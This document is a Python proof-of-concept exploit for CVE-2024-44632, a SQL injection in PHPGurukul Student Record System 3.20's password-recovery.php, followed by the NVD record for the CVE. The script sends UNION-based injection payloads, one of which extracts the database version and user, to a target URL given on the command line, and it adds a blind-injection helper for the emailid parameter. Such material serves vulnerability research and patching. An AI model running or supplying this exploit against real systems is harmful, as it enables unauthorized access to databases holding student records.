CVE-2024-44632

import requests import sys # CVE-2024-44632 SQL Injection PoC # Target: PHPGurukul Student Record System 3.20 # Location: password-recovery.php (id and emailid parameters) def exploit_sqli(target_url): """ SQL Injection exploitation using UNION-based technique """ # Payload for UNION-based SQL injection on id parameter union_payload = "1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100 -- -" # Payload for extracting database version and user info_payload = "1' UNION SELECT 1,@@version,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100 -- -" # Construct target URL target = f"{target_url}/password-recovery.php" print(f"[*] Target: {target}") print(f"[*] Exploiting SQL Injection on 'id' parameter...") # Send malicious request params = {'id': union_payload} try: response = requests.get(target, params=params, timeout=10) print(f"[+] Request sent successfully") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response Length: {len(response.text)}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") print("\n[*] Exploitation complete. Check response for SQL output.") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://victim.com/student-record-system") sys.exit(1) exploit_sqli(sys.argv[1]) # Additional blind SQL injection test for emailid parameter def blind_sqli_test(target_url, email_payload): """ Blind SQL injection test for emailid parameter """ target = f"{target_url}/password-recovery.php" params = {'emailid': email_payload} response = requests.post(target, data=params) return response

{"cve": {"id": "CVE-2024-44632", "sourceIdentifier": "[email protected]", "published": "2025-11-14T16:15:47.637", "lastModified": "2025-11-17T17:37:58.347", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PHPGurukul Student Record System 3.20 is vulnerable to SQL Injection via the id and emailid parameters in password-recovery.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:student_record_system:3.20:*:*:*:*:*:*:*", "matchCriteriaId": "3BE56291-1C2E-4DFB-84CB-1C130EBA0DE2"}]}]}], "references": [{"url": "https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44632.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://phpgurukul.com/student-record-system-php", "source": "[email protected]", "tags": ["Product"]}]}}